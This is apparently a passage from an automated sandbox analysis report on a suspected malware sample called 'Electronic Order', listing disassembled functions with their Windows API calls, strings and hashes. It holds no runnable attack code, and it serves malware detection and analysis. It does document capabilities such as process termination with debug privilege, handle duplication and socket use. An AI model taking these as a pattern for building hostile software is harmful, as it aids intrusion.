                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                      • String ID:
                                      • API String ID: 2014098862-0
                                      • Opcode ID: 2168c2f53b5885f18a615e6361ce16f6ac37ef12217a1ed3ef3eb47434941d9d
                                      • Instruction ID: e906dd2ff043f0a4b175d6d71fe5dfa538a7bd187e95457c410a4fba7501660f
                                      • Opcode Fuzzy Hash: 2168c2f53b5885f18a615e6361ce16f6ac37ef12217a1ed3ef3eb47434941d9d
                                      • Instruction Fuzzy Hash: 9D1144B5940208BEF6102F21DC89FAA3F6CEB0DB51F110425F204BB1A1C9F35C91DAA4
                                      Function 00E18E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E18A84,00000B00,?,?), ref: 00E18E0C
                                      • HeapAlloc.KERNEL32(00000000,?,00E18A84,00000B00,?,?), ref: 00E18E13
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E18A84,00000B00,?,?), ref: 00E18E28
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00E18A84,00000B00,?,?), ref: 00E18E30
                                      • DuplicateHandle.KERNEL32(00000000,?,00E18A84,00000B00,?,?), ref: 00E18E33
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E18A84,00000B00,?,?), ref: 00E18E43
                                      • GetCurrentProcess.KERNEL32(00E18A84,00000000,?,00E18A84,00000B00,?,?), ref: 00E18E4B
                                      • DuplicateHandle.KERNEL32(00000000,?,00E18A84,00000B00,?,?), ref: 00E18E4E
                                      • CreateThread.KERNEL32(00000000,00000000,00E18E74,00000000,00000000,00000000), ref: 00E18E68
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                      • String ID:
                                      • API String ID: 1957940570-0
                                      • Opcode ID: b3300dc8eb5ca4c056fa0b8e08cb996b68447d455e67e53f5056fe973305c0c9
                                      • Instruction ID: 9948d8fcdab1c4caafb93d9a978ae26871249c139e5db07c96eed07d787278fb
                                      • Opcode Fuzzy Hash: b3300dc8eb5ca4c056fa0b8e08cb996b68447d455e67e53f5056fe973305c0c9
                                      • Instruction Fuzzy Hash: C301BF79641304FFE710ABA5DC4DF573BACEB89B11F004421FA05EB2A2CA70D805CB60
                                      Function 00E39A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E17652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?,?,00E1799D), ref: 00E1766F
                                        • Part of subcall function 00E17652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?), ref: 00E1768A
                                        • Part of subcall function 00E17652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?), ref: 00E17698
                                        • Part of subcall function 00E17652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?), ref: 00E176A8
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00E39B1B
                                      • _memset.LIBCMT ref: 00E39B28
                                      • _memset.LIBCMT ref: 00E39C6B
                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00E39C97
                                      • CoTaskMemFree.OLE32(?), ref: 00E39CA2
                                      Strings
                                      • NULL Pointer assignment, xrefs: 00E39CF0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 1300414916-2785691316
                                      • Opcode ID: d8a95db168dc407eb8a1cb0eb0a18d4517f04157e55c0dda7351a57c24c18ab0
                                      • Instruction ID: bc49d688db7592d862527a3b576b304ccf445d6f41164eba5ba3a6a4c7c3c8b3
                                      • Opcode Fuzzy Hash: d8a95db168dc407eb8a1cb0eb0a18d4517f04157e55c0dda7351a57c24c18ab0
                                      • Instruction Fuzzy Hash: 1C910771D00229ABDB10DFA5DC85EDEBBB9EF08710F20415AF519B7281DB716A45CFA0
                                      Function 00E46FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E47093
                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E470A7
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E470C1
                                      • _wcscat.LIBCMT ref: 00E4711C
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E47133
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E47161
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcscat
                                      • String ID: SysListView32
                                      • API String ID: 307300125-78025650
                                      • Opcode ID: 5bf65c376d1d82315434495a1b5fd993ec99d8adfbaa5965c29f00eccc647171
                                      • Instruction ID: 4f4ce4e3d2a4a5630c301ee79e9a89aca459545cb1e7a8bbe91af700330fd235
                                      • Opcode Fuzzy Hash: 5bf65c376d1d82315434495a1b5fd993ec99d8adfbaa5965c29f00eccc647171
                                      • Instruction Fuzzy Hash: B941C470904308AFEB219F64DC85BEE77E8EF08754F10146AF588B7291D7729D848BA0
                                      Function 00E3EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E23E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00E23EB6
                                        • Part of subcall function 00E23E91: Process32FirstW.KERNEL32(00000000,?), ref: 00E23EC4
                                        • Part of subcall function 00E23E91: CloseHandle.KERNEL32(00000000), ref: 00E23F8E
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E3ECB8
                                      • GetLastError.KERNEL32 ref: 00E3ECCB
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E3ECFA
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E3ED77
                                      • GetLastError.KERNEL32(00000000), ref: 00E3ED82
                                      • CloseHandle.KERNEL32(00000000), ref: 00E3EDB7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      • Opcode ID: aff39694c0c371b33ffa66b4dcd7a351c29adcc206b1a6d4025eb712e812c678
                                      • Instruction ID: fee3d50522ee76d276dc925cd14a13ceec78837eb209c5c11acf67ca38dedcc2
                                      • Opcode Fuzzy Hash: aff39694c0c371b33ffa66b4dcd7a351c29adcc206b1a6d4025eb712e812c678
                                      • Instruction Fuzzy Hash: 42419E712002019FDB15EF24C899F6EBBA1AF40714F088459F846AB3C2DBB5A849CBA1
                                      Function 00E23226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 00E232C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      • Opcode ID: 9f29109feeda4ce8c20646e0d7f97de0e4a7143c8f2fc3364610273be822ae90
                                      • Instruction ID: 7e252cd8d5aa803d718f78e1ab7dbf86a0ea338dc7b05ab4283431bc8373349b
                                      • Opcode Fuzzy Hash: 9f29109feeda4ce8c20646e0d7f97de0e4a7143c8f2fc3364610273be822ae90
                                      • Instruction Fuzzy Hash: C91127332083A6FAE7056B65FC42CAEB3DCDF19774F20102AF504B6192E6A96B404DB5
                                      Function 00E24534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E2454E
                                      • LoadStringW.USER32(00000000), ref: 00E24555
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E2456B
                                      • LoadStringW.USER32(00000000), ref: 00E24572
                                      • _wprintf.LIBCMT ref: 00E24598
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E245B6
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 00E24593
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wprintf
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 3648134473-3128320259
                                      • Opcode ID: 54caf658e16f764c195cfcfa79a86a9795663913557ce060a19e30dfde20f37f
                                      • Instruction ID: de29a3fc3d7535bb8bd716e305b0c56e194cb086bbcc5d72aa5ca689271055c3
                                      • Opcode Fuzzy Hash: 54caf658e16f764c195cfcfa79a86a9795663913557ce060a19e30dfde20f37f
                                      • Instruction Fuzzy Hash: E7014FF6900218BFE710E7A59D89EE7776CDB08701F0005A5FB49F2152EA749E8A8B70
                                      Function 00E4D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • GetSystemMetrics.USER32(0000000F), ref: 00E4D78A
                                      • GetSystemMetrics.USER32(0000000F), ref: 00E4D7AA
                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E4D9E5
                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E4DA03
                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E4DA24
                                      • ShowWindow.USER32(00000003,00000000), ref: 00E4DA43
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E4DA68
                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00E4DA8B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                      • String ID:
                                      • API String ID: 1211466189-0
                                      • Opcode ID: c73826263a4300b4e08e3c56af7b33daf3f07df93aa074b665d4bde39e5fc51e
                                      • Instruction ID: 463ed97cfc29d91d34a5f49d017d5bd1e2ad76a31db44bb98edc28c1d7e6308e
                                      • Opcode Fuzzy Hash: c73826263a4300b4e08e3c56af7b33daf3f07df93aa074b665d4bde39e5fc51e
                                      • Instruction Fuzzy Hash: B2B1B931604225EFDF18CF69D9897BD7BB1FF48704F08906AED48AB295D734A950CBA0
                                      Function 00DC2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00DFC417,00000004,00000000,00000000,00000000), ref: 00DC2ACF
                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00DFC417,00000004,00000000,00000000,00000000,000000FF), ref: 00DC2B17
                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00DFC417,00000004,00000000,00000000,00000000), ref: 00DFC46A
                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00DFC417,00000004,00000000,00000000,00000000), ref: 00DFC4D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: 2634ff31b5000a9441e996304f3030927a3fd177de58da8962fa9d2d4300c4c6
                                      • Instruction ID: 5dec6f2bd67ea202fceb33d86be5cb70a68cae359bf5b9b571640ea6b540f7f4
                                      • Opcode Fuzzy Hash: 2634ff31b5000a9441e996304f3030927a3fd177de58da8962fa9d2d4300c4c6
                                      • Instruction Fuzzy Hash: 854128302146869EC7398B299D9CF7B3BA2AF86310F1DC81DE18BD75A0C675E856D730
                                      Function 00E27368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E2737F
                                        • Part of subcall function 00DE0FF6: std::exception::exception.LIBCMT ref: 00DE102C
                                        • Part of subcall function 00DE0FF6: __CxxThrowException@8.LIBCMT ref: 00DE1041
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E273B6
                                      • EnterCriticalSection.KERNEL32(?), ref: 00E273D2
                                      • _memmove.LIBCMT ref: 00E27420
                                      • _memmove.LIBCMT ref: 00E2743D
                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E2744C
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E27461
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E27480
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 256516436-0
                                      • Opcode ID: 654f940c533b8641a682bdde28e0b6c7a49b875ffb93474d34ff6b884380d582
                                      • Instruction ID: ae1e818638874146054e8f31e7779c01a30164182c009d3b7bac9210e011b8b7
                                      • Opcode Fuzzy Hash: 654f940c533b8641a682bdde28e0b6c7a49b875ffb93474d34ff6b884380d582
                                      • Instruction Fuzzy Hash: AE31BA36A04205EFCF10EF66DC85AAFBBB8EF45710B1440A5F904AB256DB70DA54CBB0
                                      Function 00E46442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00E4645A
                                      • GetDC.USER32(00000000), ref: 00E46462
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E4646D
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00E46479
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E464B5
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E464C6
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E49299,?,?,000000FF,00000000,?,000000FF,?), ref: 00E46500
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E46520
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      • Opcode ID: 7644b319bb20a5dfed483ed40025add7fa8976e16f0586fa5e3314b82c03eb4c
                                      • Instruction ID: 74950ff54bebe326d35e6d76b7ba95a796a19fedc54a830f301ba5578cbb709c
                                      • Opcode Fuzzy Hash: 7644b319bb20a5dfed483ed40025add7fa8976e16f0586fa5e3314b82c03eb4c
                                      • Instruction Fuzzy Hash: 7E319176201210BFEF108F51DC49FEB3FA9EF4A765F050065FE08AA191C6759C42CBA0
                                      Function 00E1C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: dc772621cd8f864ef515af9c019135457c7a635c4f1a7369936ac3be7832444f
                                      • Instruction ID: b336449fd0a9ba94932f145175a8e7cee0ddbe1397fb3fba4f16fce38aaf5ce5
                                      • Opcode Fuzzy Hash: dc772621cd8f864ef515af9c019135457c7a635c4f1a7369936ac3be7832444f
                                      • Instruction Fuzzy Hash: CD21C5767C1305B7D210B5218C42FEB23ACEF15399B242028FE09F6283E761DD55C2B6
                                      Function 00E2ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                        • Part of subcall function 00DDFEC6: _wcscpy.LIBCMT ref: 00DDFEE9
                                      • _wcstok.LIBCMT ref: 00E2EEFF
                                      • _wcscpy.LIBCMT ref: 00E2EF8E
                                      • _memset.LIBCMT ref: 00E2EFC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                      • String ID: X
                                      • API String ID: 774024439-3081909835
                                      • Opcode ID: d01ee4147a72ca99cd6919b097466c28a0ce152c8711e5885b549e7a82b70d05
                                      • Instruction ID: 4ab8f0d8e722325603aa938cba3d3b1e2d989587eb8a20aed5ce54f1e6bc4207
                                      • Opcode Fuzzy Hash: d01ee4147a72ca99cd6919b097466c28a0ce152c8711e5885b549e7a82b70d05
                                      • Instruction Fuzzy Hash: B7C1AF316083519FD724EF24D995E5AB7E4FF84314F00492DF899AB2A2DB30ED45CBA2
                                      Function 00E36E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E36F14
                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E36F35
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E36F48
                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00E36FFE
                                      • inet_ntoa.WSOCK32(?), ref: 00E36FBB
                                        • Part of subcall function 00E1AE14: _strlen.LIBCMT ref: 00E1AE1E
                                        • Part of subcall function 00E1AE14: _memmove.LIBCMT ref: 00E1AE40
                                      • _strlen.LIBCMT ref: 00E37058
                                      • _memmove.LIBCMT ref: 00E370C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                      • String ID:
                                      • API String ID: 3619996494-0
                                      • Opcode ID: e3dd70e75b227c42a97909ea6b9349e67bcd4d1bf5374d0715af971542aa86af
                                      • Instruction ID: d8a3299e0f1824c17a4a5d37d6b806946abd39a1bc9cd410b99dad18b8cb539a
                                      • Opcode Fuzzy Hash: e3dd70e75b227c42a97909ea6b9349e67bcd4d1bf5374d0715af971542aa86af
                                      • Instruction Fuzzy Hash: 6481F171108301AFC724EB24CC99F6BBBE9EF84714F10851CF555AB292DA71AD45CB62
                                      Function 00DC1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
